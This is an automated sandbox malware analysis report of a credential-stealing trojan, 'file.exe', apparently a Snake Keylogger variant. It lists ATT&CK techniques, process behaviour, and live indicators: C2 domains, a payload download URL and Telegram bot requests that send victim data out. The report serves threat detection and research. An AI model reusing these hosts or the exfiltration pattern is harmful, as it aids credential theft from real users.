Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 111 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 41 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 3 File and Directory Discovery; 116 System Information Discovery; 1 Query Registry; 211 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1518332 | Sample: file.exe | Startdate: 25/09/2024 | Architecture: WINDOWS | Score: 100
(bracketed numbers after a process name are the graph's per-process counters, see legend)

• Start: contacts reallyfreegeoip.org, api.telegram.org and 2 other IPs or domains; signatures: Found malware configuration, Antivirus detection for URL or domain, Multi AV Scanner detection for dropped file, 6 other signatures; started file.exe [1 29]
• reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
• api.telegram.org: Uses the Telegram API (likely for C&C communication)
• file.exe: dropped C:\Users\user\AppData\Local\...\nsExec.dll (PE32); started powershell.exe [20]
• powershell.exe: dropped C:\Users\user\AppData\Local\...\file.exe (PE32) and C:\Users\user\...\file.exe:Zone.Identifier (ASCII); signatures: Writes to foreign memory regions, Found suspicious powershell code related to unpacking or dynamic code loading, Powershell drops PE file; started wabmig.exe [15 8] and conhost.exe
• wabmig.exe: connects to api.telegram.org 149.154.167.220, 443, 49730 (TELEGRAMRU, United Kingdom), reallyfreegeoip.org 188.114.97.3, 443, 49713, 49715 (CLOUDFLARENETUS, European Union) and 2 other IPs or domains; signatures: Tries to steal Mail credentials (via file / registry access), Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
file.exe | 21% | ReversingLabs | Win32.Trojan.Generic

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exe | 21% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://varders.kozow.com:8081 | 0% | URL Reputation | safe
http://aborters.duckdns.org:8081 | 100% | URL Reputation | malware
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
http://anotherarmy.dns.army:8081 | 100% | URL Reputation | malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://www.office.com/lB | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=en | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://www.office.com/ | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20a | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20and%20Time:%2025/09/2024%20/%2022:55:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20093954%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=enlB | 0% | Avira URL Cloud | safe
http://crl.microsoft0Wq | 0% | Avira URL Cloud | safe
http://185.29.11.53/fhSIfglR68.bin | 0% | Avira URL Cloud | safe
http://185.29.11.53/fhSIfglR68.bin; | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 132.226.247.73 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.33 | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20and%20Time:%2025/09/2024%20/%2022:55:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20093954%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
http://185.29.11.53/fhSIfglR68.bin | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | wabmig.exe, 00000007.00000002.2695880589.0000000022FCD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20a | wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/lB | wabmig.exe, 00000007.00000002.2695880589.0000000022FC8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org | wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | file.exe, file.exe.2.dr | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=en | wabmig.exe, 00000007.00000002.2695880589.0000000022F9C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://varders.kozow.com:8081 | wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://aborters.duckdns.org:8081 | wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://ac.ecosia.org/autocomplete?q= | wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2207916280.0000000004D91000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E55000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://anotherarmy.dns.army:8081 | wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=enlB | wabmig.exe, 00000007.00000002.2695880589.0000000022F97000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org | wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E2A000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2207916280.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoft0Wq | powershell.exe, 00000002.00000002.2212699188.00000000074A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.29.11.53/fhSIfglR68.bin; | wabmig.exe, 00000007.00000002.2683738778.0000000007843000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/ | wabmig.exe, 00000007.00000002.2695880589.0000000022E2A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
185.29.11.53 | unknown | European Union | 203557 | DATACLUB-NL | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1518332
Start date and time: 2024-09-25 15:59:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/12@3/4
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 157
                    • Number of non-executed functions: 45
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 7496 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: file.exe
Time | Type | Description
10:00:08 | API Interceptor | 31x Sleep call for process: powershell.exe modified
10:01:29 | API Interceptor | 416x Sleep call for process: wabmig.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 149.154.167.220
• z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger
• rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger
• Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger
• test.bat | malicious | MicroClip
• rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger
• rTEKL__FTALEPVEF__YATTEKL__F__.exe | malicious | Snake Keylogger, VIP Keylogger
• rBSH200924_pdf.cmd.exe | malicious | VIP Keylogger
• Or3dzp4vB1.exe | malicious | XWorm
• z9OutstandingPayment.exe | malicious | Snake Keylogger, VIP Keylogger
• rdoc17000320240923070456.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
Match: 188.114.97.3
• PO5118000306 pdf.exe | malicious | FormBook | www.rtprajalojago.live/2wnz/
• (PO403810)_VOLEX_doc.exe | malicious | Lokibot | dddotx.shop/Mine/PWS/fre.php
• QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/DiF66Hbf/download
• http://easyantrim.pages.dev/id.html | malicious | HTMLPhisher | easyantrim.pages.dev/id.html
• QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/13rSMZZi/download
• Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook | www.rtpngk.xyz/yhsl/
• PO-001.exe | malicious | FormBook | www.x0x9x8x8x7x6.shop/assb/
• PO2024033194.exe | malicious | FormBook | www.cc101.pro/4hfb/
• ADNOC REQUESTS & reviews.exe | malicious | FormBook | www.chinaen.org/zi4g/
• updater.exe | malicious | Unknown | microsoft-rage.world/Api/v3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: reallyfreegeoip.org
• z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
• rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 188.114.96.3
• cargo details.exe | malicious | Snake Keylogger | 188.114.96.3
• Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 188.114.96.3
• FAKTURA_.EXE.exe | malicious | DarkTortilla, Snake Keylogger | 188.114.97.3
• rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
• rTEKL__FTALEPVEF__YATTEKL__F__.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
• rPROFORMAINVOICE-PO_ATS_1036pdf.exe | malicious | Snake Keylogger | 188.114.96.3
• rBSH200924_pdf.cmd.exe | malicious | VIP Keylogger | 188.114.97.3
• rShippingDocuments_Pdf.exe | malicious | Snake Keylogger | 188.114.96.3
Match: checkip.dyndns.com
• z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
• rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 132.226.247.73
• cargo details.exe | malicious | Snake Keylogger | 132.226.247.73
• Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 132.226.247.73
• FAKTURA_.EXE.exe | malicious | DarkTortilla, Snake Keylogger | 193.122.6.168
• rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
• rTEKL__FTALEPVEF__YATTEKL__F__.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
• rPROFORMAINVOICE-PO_ATS_1036pdf.exe | malicious | Snake Keylogger | 132.226.8.169
• rBSH200924_pdf.cmd.exe | malicious | VIP Keylogger | 193.122.6.168
• rShippingDocuments_Pdf.exe | malicious | Snake Keylogger | 132.226.247.73
Match: api.telegram.org
• z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 149.154.167.220
• Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 149.154.167.220
• test.bat | malicious | MicroClip | 149.154.167.220
• rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• rTEKL__FTALEPVEF__YATTEKL__F__.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• rBSH200924_pdf.cmd.exe | malicious | VIP Keylogger | 149.154.167.220
• Or3dzp4vB1.exe | malicious | XWorm | 149.154.167.220
• z9OutstandingPayment.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• rdoc17000320240923070456.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        TELEGRAMRU | z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
                                        TELEGRAMRU | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 149.154.167.220
                                        TELEGRAMRU | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 149.154.167.220
                                        TELEGRAMRU | test.bat | malicious | MicroClip | 149.154.167.220
                                        TELEGRAMRU | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
                                        TELEGRAMRU | rTEKL__FTALEPVEF__YATTEKL__F__.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
                                        TELEGRAMRU | rBSH200924_pdf.cmd.exe | malicious | VIP Keylogger | 149.154.167.220
                                        TELEGRAMRU | Or3dzp4vB1.exe | malicious | XWorm | 149.154.167.220
                                        TELEGRAMRU | z9OutstandingPayment.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
                                        TELEGRAMRU | rdoc17000320240923070456.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
                                        CLOUDFLARENETUS | Shipping documents 000022999878999800009999.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
                                        CLOUDFLARENETUS | EFT Remittance - 25_09_24 Ref_3c70ac202caa933179b3568afa512866a7bd5171.eml | malicious | Unknown | 104.17.25.14
                                        CLOUDFLARENETUS | z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
                                        CLOUDFLARENETUS | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 188.114.96.3
                                        CLOUDFLARENETUS | cargo details.exe | malicious | Snake Keylogger | 188.114.96.3
                                        CLOUDFLARENETUS | update.ps1 | malicious | NetSupport RAT, HTMLPhisher | 104.21.73.126
                                        CLOUDFLARENETUS | https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1 | malicious | HtmlDropper | 104.18.94.41
                                        CLOUDFLARENETUS | hnvc.vbs | malicious | PureLog Stealer | 188.114.97.3
                                        CLOUDFLARENETUS | 1e#U0414.exe | malicious | Lokibot | 188.114.96.3
                                        CLOUDFLARENETUS | wm.vbs | malicious | PureLog Stealer, XWorm | 188.114.96.3
                                        DATACLUB-NL | Shipping documents 000022999878999800009999.exe | malicious | AgentTesla, GuLoader | 185.29.11.53
                                        DATACLUB-NL | Ze1Ueabtx5.img | malicious | AgentTesla, GuLoader | 185.29.11.53
                                        DATACLUB-NL | Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader | 185.29.11.53
                                        DATACLUB-NL | PO 00009876660887666000.bat.exe | malicious | AgentTesla, GuLoader | 84.38.133.121
                                        DATACLUB-NL | Bankcopyscanneddoc.exe | malicious | RedLine | 84.38.129.21
                                        DATACLUB-NL | xCjIO3SCur0S.exe | malicious | Remcos | 185.29.11.23
                                        DATACLUB-NL | new.cmd | malicious | GuLoader | 185.29.11.28
                                        DATACLUB-NL | temp.cmd | malicious | Unknown | 185.29.11.28
                                        DATACLUB-NL | price_request_.exe | malicious | AgentTesla, GuLoader | 185.29.11.62
                                        DATACLUB-NL | disprovable.dll | malicious | CryptOne, Qbot | 84.38.133.191
                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        54328bd36c14bd82ddaa0c04b25ed9ad | z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
                                        54328bd36c14bd82ddaa0c04b25ed9ad | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 188.114.97.3
                                        54328bd36c14bd82ddaa0c04b25ed9ad | cargo details.exe | malicious | Snake Keylogger | 188.114.97.3
                                        54328bd36c14bd82ddaa0c04b25ed9ad | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 188.114.97.3
                                        54328bd36c14bd82ddaa0c04b25ed9ad | FAKTURA_.EXE.exe | malicious | DarkTortilla, Snake Keylogger | 188.114.97.3
                                        54328bd36c14bd82ddaa0c04b25ed9ad | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
                                        54328bd36c14bd82ddaa0c04b25ed9ad | rTEKL__FTALEPVEF__YATTEKL__F__.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
                                        54328bd36c14bd82ddaa0c04b25ed9ad | rPROFORMAINVOICE-PO_ATS_1036pdf.exe | malicious | Snake Keylogger | 188.114.97.3
                                        54328bd36c14bd82ddaa0c04b25ed9ad | rBSH200924_pdf.cmd.exe | malicious | VIP Keylogger | 188.114.97.3
                                        54328bd36c14bd82ddaa0c04b25ed9ad | t1RVQb98yT.exe | malicious | S400 RAT | 188.114.97.3
                                        3b5074b1b5d032e5620f69f9f700ff0e | Shipping documents 000022999878999800009999.exe | malicious | AgentTesla, GuLoader | 149.154.167.220
                                        3b5074b1b5d032e5620f69f9f700ff0e | z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
                                        3b5074b1b5d032e5620f69f9f700ff0e | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 149.154.167.220
                                        3b5074b1b5d032e5620f69f9f700ff0e | update.ps1 | malicious | NetSupport RAT, HTMLPhisher | 149.154.167.220
                                        3b5074b1b5d032e5620f69f9f700ff0e | https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1 | malicious | HtmlDropper | 149.154.167.220
                                        3b5074b1b5d032e5620f69f9f700ff0e | https://texicoschools-my.sharepoint.com/:f:/p/bhadley/EsaMKJ-X61dEm1tZEaws2DMBSjLuzfhGBl4pu2aaho1XiQ?e=fJogeV | malicious | Unknown | 149.154.167.220
                                        3b5074b1b5d032e5620f69f9f700ff0e | hnvc.vbs | malicious | PureLog Stealer | 149.154.167.220
                                        3b5074b1b5d032e5620f69f9f700ff0e | wm.vbs | malicious | PureLog Stealer, XWorm | 149.154.167.220
                                        3b5074b1b5d032e5620f69f9f700ff0e | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 149.154.167.220
                                        3b5074b1b5d032e5620f69f9f700ff0e | http://mir-belting.com | malicious | Unknown | 149.154.167.220
                                        Match | Associated Sample Name / URL | Detection | Threat Name
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | Shipping documents 000022999878999800009999.exe | malicious | AgentTesla, GuLoader
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | Ze1Ueabtx5.img | malicious | AgentTesla, GuLoader
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | 4hIPvzV6a2.exe | malicious | Unknown
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | 3Dut8dFCwD.exe | malicious | Unknown
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | Ms63nDrOBa.exe | malicious | Unknown
